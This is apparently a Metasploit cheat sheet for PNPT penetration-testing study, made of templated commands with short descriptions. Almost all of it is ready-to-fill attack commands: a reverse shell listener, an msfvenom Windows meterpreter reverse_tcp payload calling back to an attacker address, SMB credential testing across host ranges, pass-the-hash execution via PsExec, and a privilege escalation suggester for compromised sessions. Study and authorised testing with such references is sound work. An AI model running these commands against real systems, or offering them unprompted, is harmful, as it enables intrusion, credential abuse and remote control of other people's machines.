Reverse Shell Handler
Set up a multi-handler to listen for incoming connections from a payload.
msfconsole -q -x "use multi/handler; set payload {{payload}}; set LHOST {{lhost}}; set LPORT {{lport}}; exploit"SMB Login Scanner
Test credentials against a range of systems using SMB.
use auxiliary/scanner/smb/smb_login
set RHOSTS {{target_range}}
set SMBUser {{user}}
set SMBPass {{password}}
runPass-the-Hash with PsExec
Gain command execution on a target using an NTLM hash.
use exploit/windows/smb/psexec
set RHOSTS {{target_ip}}
set SMBUser {{user}}
set SMBPass {{lm_hash}}:{{ntlm_hash}}
exploitPayload Generation (msfvenom)
Create a standalone payload for reverse shell execution.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{kali_ip}} LPORT={{lport}} -f exe -o {{output_file}}Post-Exploitation: Local Exploit Suggester
Identify potential privilege escalation paths on a compromised system.
use post/multi/recon/local_exploit_suggester
set SESSION {{session_id}}
runDescription
The Metasploit Framework is a comprehensive platform for penetration testing and exploitation. In PNPT, it is used for handling reverse shells, performing automated vulnerability scanning, and executing common exploits. It is also an essential tool for privilege escalation research through its local exploit suggester.